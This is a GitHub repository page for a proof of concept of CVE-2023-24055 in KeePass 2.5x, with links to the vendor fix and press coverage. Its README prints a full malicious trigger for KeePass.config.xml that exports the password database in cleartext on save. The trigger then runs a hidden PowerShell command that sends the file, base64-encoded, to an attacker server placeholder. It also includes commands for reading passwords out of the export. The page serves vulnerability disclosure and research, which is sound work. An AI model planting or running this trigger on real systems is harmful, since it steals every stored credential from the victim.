Skip to content

alt3kx/CVE-2023-24055_PoC

main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

@alt3kx
alt3kx KeePass Fix Released : Changes from 2.53 to 2.53.1
f7a9184 Feb 10, 2023
KeePass Fix Released : Changes from 2.53 to 2.53.1
f7a9184

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
LICENSE
Initial commit
January 25, 2023 04:21
README.md
KeePass Fix Released : Changes from 2.53 to 2.53.1
February 10, 2023 09:03
CVE-2023-24055 PoC (KeePass 2.5x) Under discussion and analysis... My early PoC (KeePass 2.5x) Trigger PoC details Trigger PoC values Trigger public examples: Fix Released : Changes from 2.53 to 2.53.1: Further readings (*) What this KeePass CVE means for organizations searching for new password vaults (Carlos Perez) (*) KeePass disputes report of flaw that could exfiltrate a database (Steve Zurier) (*) Security Weekly News (06:56 KeePass) (*) KeePass 2.53.1, une nouvelle version qui corrige « la vulnérabilité » CVE-2023-24055 (IT Connect FR) (*) Tools Author

README.md

CVE-2023-24055 PoC (KeePass 2.5x)

Under discussion and analysis...

https://sourceforge.net/p/keepass/discussion/329220/thread/a146e5cf6b/
https://sourceforge.net/p/keepass/feature-requests/2773/

An attacker who has write access to the KeePass configuration file can modify it and inject malicious triggers, e.g to obtain the cleartext passwords by adding an export trigger.

https://nvd.nist.gov/vuln/detail/CVE-2023-24055
https://www.cve.org/CVERecord?id=CVE-2023-24055

My early PoC (KeePass 2.5x)

(1) An attacker who has write access to the KeePass configuration file KeePass.config.xml could inject the following trigger, e.g:

<?xml version="1.0" encoding="utf-8"?>
<TriggerCollection xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
	<Triggers>
		<Trigger>
			<Guid>lztpSRd56EuYtwwqntH7TQ==</Guid>
			<Name>exploit</Name>
			<Events>
				<Event>
					<TypeGuid>s6j9/ngTSmqcXdW6hDqbjg==</TypeGuid>
					<Parameters>
						<Parameter>0</Parameter>
						<Parameter />
					</Parameters>
				</Event>
			</Events>
			<Conditions />
			<Actions>
				<Action>
					<TypeGuid>D5prW87VRr65NO2xP5RIIg==</TypeGuid>
					<Parameters>
						<Parameter>c:\Users\John\AppData\Local\Temp\exploit.xml</Parameter>
						<Parameter>KeePass XML (2.x)</Parameter>
						<Parameter />
						<Parameter />
					</Parameters>
				</Action>
				<Action>
					<TypeGuid>2uX4OwcwTBOe7y66y27kxw==</TypeGuid>
					<Parameters>
						<Parameter>PowerShell.exe</Parameter>
						<Parameter>-ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml'))) </Parameter>
						<Parameter>False</Parameter>
						<Parameter>1</Parameter>
						<Parameter />
					</Parameters>
				</Action>
			</Actions>
		</Trigger>
	</Triggers>
</TriggerCollection>

(2) Victim will open the keePass as normally activity , saving changes, etc...., the trigger will executed on background exfiltrating the credentials to attacker server

Trigger PoC details

a) The trigger will export the keepass database in KeePass XML (2.x) format included all the credentials (cleartext) into folowing path, e.g:

c:\Users\John\AppData\Local\Temp\exploit.xml

b) Once exported the file , a second action could be defined to exfiltrate the XML data using Powershell.exe and encoded to base64 e.g:

PowerShell.exe -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))

c) Data will exfiltrate to attacker web server e.g:

1

Trigger PoC values

Name: Trigger
Events: Saved database file | [Equals]
Conditions: <empty>
Actions: 

(1) Export active database 
File/URL: c:\Users\John\AppData\Local\Temp\exploit.xml
File/Format:  KeePass XML (2.x)

(2) Execute command line / URL
File/URL: PowerShell.exe
Arguments: -ex bypass -noprofile -c Invoke-WebRequest -uri http://attacker_server_here/exploit.raw -Method POST -Body ([System.Convert]::ToBase64String([System.IO.File]::ReadAllBytes('c:\Users\John\AppData\Local\Temp\exploit.xml')))
Window style: Hidden

Credentials...

PS C:\Users\John\AppData\Local\Temp> type .\exploit.xml  | Select-String -Pattern Password

2

3

Trigger public examples:

https://keepass.info/help/kb/trigger_examples.html

Fix Released : Changes from 2.53 to 2.53.1:

https://keepass.info/news/n230109_2.53.html

Removed the 'Export - No Key Repeat' application policy flag; KeePass now always asks for the current master key when trying to export data.

Further readings

(*) What this KeePass CVE means for organizations searching for new password vaults (Carlos Perez)

https://www.trustedsec.com/blog/what-this-keepass-cve-means-for-organizations-searching-for-new-password-vaults/
https://www.youtube.com/watch?v=OEaFaSjaZY4

(*) KeePass disputes report of flaw that could exfiltrate a database (Steve Zurier)

https://www.scmagazine.com/analysis/identity-and-access/keepass-disputes-report-of-flaw-that-could-exfiltrate-a-database

(*) Security Weekly News (06:56 KeePass)

https://www.youtube.com/watch?v=iz0PsYlH8Ig

(*) KeePass 2.53.1, une nouvelle version qui corrige « la vulnérabilité » CVE-2023-24055 (IT Connect FR)

https://www.it-connect.fr/keepass-2-53-1-une-nouvelle-version-qui-corrige-la-vulnerabilite/
https://www.it-connect.fr/faille-critique-dans-keepass-un-attaquant-peut-exporter-les-mots-de-passe-en-clair/

(*) Tools

https://github.com/deetl/CVE-2023-24055
https://blog.harmj0y.net/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
https://github.com/Orange-Cyberdefense/KeePwn

Author

Alex Hernandez aka (@_alt3kx_)

About

CVE-2023-24055 PoC (KeePass 2.5x)

github.com/alt3kx/CVE-2023-24055_PoC

Resources

Readme

License

GPL-3.0 license

Stars

242 stars

Watchers

7 watching

Forks

39 forks